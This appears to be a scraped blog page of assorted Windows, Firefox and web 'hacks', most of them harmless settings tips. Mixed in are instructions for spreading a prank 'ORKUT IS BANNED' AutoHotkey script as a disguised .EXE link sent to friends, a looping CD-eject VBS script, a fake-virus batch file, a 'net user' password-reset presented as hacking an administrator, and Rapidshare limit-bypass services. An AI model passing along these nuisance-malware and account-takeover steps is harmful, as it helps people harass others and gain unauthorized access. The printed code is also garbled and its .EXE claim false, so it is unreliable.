Want to know how to automatically redirect your visitors to the new web page??...

Its very simple.Just add the following HTML tag :





- Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

variable name: moz_no_remote(should be all small letter)
variable value: 1

press ok to close all windows.

- Open firefox icon’s properties(from desktop and quick launch). add extension -p to command line(like “c:\program files\mozilla firefox\firefox.exe” -p). press ok.

while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any site (orkut,yahoo.. etc)..

In WINDOWS we can create undeletable and unreadable folders..

- By holding the alt key, type numbers on the number pad (right of the keyboard) you can create special characters. If you hold the alt key, then press 1, then let go, you got the ASCII character 1.

- Open a dos prompt, and type md (alt+1+9+4)someword. md is the dos command for creating a new directoy, now try and open the directory in Windows, you can't.

- To open it, type ren (alt+1+9+4)someword someword (ren is the dos command to rename)

Windows Vista: Select Start, then hover over the right arrow that is to the right of the padlock icon until the pop-up menu appears that contains “restart” as one of it’s choices. Hold down the SHIFT key while clicking on the “restart” choice.

Windows XP: Select Start. Select “Shut Down…”. Change the drop-down combo box under “What do you want the computer to do?” to “Restart”. Hold down the SHIFT key while clicking on the “OK” button.

If you like using Firefox 3, but you miss using your extensions which are not compatible with Firefox 3, there is something you can try. Go to the address bar and type: about:config once it shows the list of configuration preferences, right click on the list and select New -> Boolean from the menu. This will pop up a window that asks for the name of the new preference; enter extensions.checkCompatibility and set the value to false.

Once you restart your browser, it will no longer check for plug-in compatibility when Firefox 3 starts. I've found that even though most of my plug-ins are not "technically compatible", they still work in Firefox 3 without any apparent issues once you can get by the compatibility check.

In Windows, in the contextual right-click menu there is a "Send To" option but no option for "Copy To". The "Copy To" option exists, but it is disabled by default so that it doesn't show up when you right-click. If you want to add the "Copy To" menu back, you can do so with a registry hack.

To enable the "Copy To" option, run the regedit program by going to Start -> Run, and entering regedit and hitting Enter. Once the registry editor is open, navigate to the HKEY_CLASSES_ROOT + AllFilesystemObjects + shellex + ContextMenuHandlers section. You'll see the "Send To" entry there as an entry under this. Right-click on the ContextMenuHandlers entry and select New > Key from the list.

Name the new key Copy To. In the right pane, you will see an entry called Default, double click on thus entyr and enter a value of {C2FBB630-2971-11D1-A18C-00C04FD75D13} (yeah, the braces and everything). Once done editing, close the registry editor.

If you hate always having to adjust your Num Lock, Scroll Lock and Caps Lock buttons when you boot your computer, there is a registry edit that allows you to define the default state of these locks when you computer boots up. To edit this value do the following.

1 - Open the Registry Editor (go to Start -> Run, type regedit then hit Enter).

2 - In the left pane, navigate to HKEY_USERS -> .DEFAULT -> Control Panel -> Keyboard

3 - You'll see an entry on the right called InitialKeyboardIndicators. The "usual" default value is 0. Double click on this entry and change the value to something between 0 and 7 where each value has the following behavior:

0 = All Locks unset
1 = Caps Lock on
2 = Num Lock on
3 = Caps Lock and Num Lock on
4 = Scroll Lock on
5 = Caps Lock and Scroll Lock on
6 = Num Lock and Scroll Lock on
7 = All Locks on

Once you are done editing, close the editor and reboot. Then be amazed at how when your computer comes on, the Lock keys will be set to your liking.

YouTube has recently started offering videos in higher quality since they get a lot of complaints about how bad their video quality is. If you are looking at a video and you want to see it in higher quality, go to the address bar in your browser and add this to the end of the URL:

&fmt=18

This won't work for all videos since only newer videos have the higher quality encoding available. But adding it won't break anything either.

Here's a hack you can use to filter Google search results to limit them to a certain time frame.

- Go to Google and perform the search you want to do.

- Once you get your results, go up to the address bar and add the following to the end of the URL there: &as_qdr=d

If you do that, you'll get back your previous search results, but filtered to limit them to the last day. Also, once you do this, you'll get a pull-down menu to the right of your search term that allows you to select other time frames.

You can also adjust the URL to get any time frame you want, you are not limited to those in the pull-down menu. To get other time frames, edit the URL parameter that you entered before by adding a number after the d to get results over that many days. You can also use w for weeks, m for months, and y for years. So some example URLs would be:

...&as_qdr=d3... results from the last 3 days
...&as_qdr=w2... results from the last 2 weeks
...&as_qdr=m4... results from the last 4 months
...&as_qdr=y6... results from the last 6 years

You can put customized text in the Windows taskbar to the right of the time. To do this, open the Control Panel and select "Regional and Language Options". When this opens, click on the "Customize..." button and then select the "Time" tab in the new window. You should see fields called "AM Symbol:" and "PM Symbol:". They probably have the text "AM" and "PM" in them. But you can change this to anything you like and this text will then show up after the time in the taskbar.

Once you make a change hit the "Apply" button, then "OK", then "Apply" and "OK" again to save your changes and have them show up. This works in both Windows Vista and XP.

- right click on 'my computer' on the desktop.Click on properties,in the properties window click on 'advanced'

- click on the 'settings' tab under 'performance' and look for the option that says "use drop down shadows for icon labels on desktop'

-check that option
click ok
click ok
done !


Rapidshare places various limits on non-premium or free users of their file-hosting service. First, you need to wait about a minute to get your download slot. For the next download, you are made to wait even more. And you cannot use download managers like DAP with their free service.

Rapidshare premium link generators help you bypass these download limits. Just supply your rapidshare download links to the generator, and start downloading. Below given is a list of these premium link generators.

* RapiDL
* Rsfox
* RapidDownloader
* Rapid-Load
* Senditnow

"Orkut is banned you fool, MUHAHAHA!!" With a window ORKUT IS BANNED... I think u have seen this messageon ur frnds computer or u have been experienced it...

I guess u have been in a dilemma y dis mesg pops up wenever u try to open mozilla firefox or sometimes wen u try to login in orkut...This is nothing but a worm named as w32.USB worm, it spreads in ur comp wen u insert a pen drive into USB port & this w32.USB is get into ur PC or by clicking any link which contains this worm....

Here is the code which abandons or bans u from using mozilla firefox and orkut...

ifwinactive ahk_class IFrame
{
ControlGetText,ed,edit1,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{.......}
}

You have to copy the above code & paste in notepad & save with an extension .EXE

Now the main work starts u have to upload the exe file into hosting services like www.freeweb7.com...scrap that link to ur frnds & if they click on it they ll get dat virus & they ll be banned ...

- open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

- variable name: moz_no_remote(should be all small letter)

- variable value: 1

- press ok to close all windows.

- open firefox icon’s properties(from desktop and quick launch). add extension -p to command line(like “c:\program files\mozilla firefox\firefox.exe” -p). press ok.

- while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any(orkut,yahoo,rediff or anything else)……


Breaking into secured networks or computers is not an easy job, especially with the level of security some companies employ. Still, the fact remains – anything the mind of man can conjure can be broken into – and this is a challenge that no hacker can resist.

Understanding the means by which hackers pursue their nefarious activities is one way of dealing with the problem; knowing how they do it provides you with a basis for developing countermeasures. Among the tools that hackers use are:

Password-Cracking Tools :
People and organizations that rely solely on passwords for security are at greater risk than those who use multi-factor authentication systems. This is because new computers can process more information in less time than ever before; password-cracking tools such as automated dictionary attacks have become more powerful and process faster with the latest computer processors.

Manufacturer's Defaults :
Turn on your internet browser and do a search for “default passwords” – you'll find numerous sites that can provide you with detailed information on default settings – including access codes, settings, and passwords that are used by hardware and software manufacturers when programming their products prior to delivery.

Hackers make use of these for planning attacks on networks and standalone computers. The best defense against these is to do the unexpected – change and remove the manufacturer's default settings before even uploading new products or installing additional software.

Data Mining :
Many hackers spend a lot of time preparing for their attacks – including conducting in-depth research into the targeted companies, key officers and authority figures, and so on using readily available information in the public domain.

Infiltration and Espionage :
Most security measures are directed against external threats; what security experts do not want to talk about is the fact that internal threats form a far more insidious approach for hackers.

While some hackers may make the effort of joining a company in order to get data from within, there are other ways of getting inside information. Disgruntled employees, bribes, lax measures such as allowing passwords of terminated employees to remain (such passwords can be sold) are some of the ways that hackers can get information.

Con Games :
Confidence' games aimed at generating inside information that can be used in an attack are part and parcel of a hacker's tool kit. The objective of the exercise is to gain the confidence of key people in the organization, and use information as a starting point to infiltrate company networks or personal computers.

There are documented cases of hackers posing as IT services people calling up employees by phone and 'demanding' privileged information such as passwords and account numbers. Most people, when confronted with such a move, usually give in – unwittingly providing hackers with a means of breaking into the network.

Trojan Horses :
A Trojan horse is malicious code carried as a 'payload' of an application (malicious or benign). A Trojan horse can open a backdoor into a system or network through which an unscrupulous individual can gain access to confidential information.

There is a code in VBS which helps you to hack and open the tray of a cd-rom drive whenever it remains closed :

- Open a notepad and paste the following code:

do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop

- Save the code as anyname.vbs

- When u open the the saved file,your Cd-Rom drive will open whenever it is closed. Cool eh..

Open a notebad and copy-paste the following:

@echo off
echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTATTING ANTIVIRUS
pause
echo DO YOU WANT TO DELETE ANTIVIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS
echo VIRUS ACTIVATED
pause
:1
dir/s
goto 1


Save the file as anyname.bat

It is very easy to hack an administrators user password in Windows Xp!

Just follow steps below...

- Go to Start-->Run and type "cmd" to open the command prompt
- Type "net user" and press enter to see all the accounts name
- Type "net user (account name) *"
- Type the password you want and then confirm it.

Add this topic to :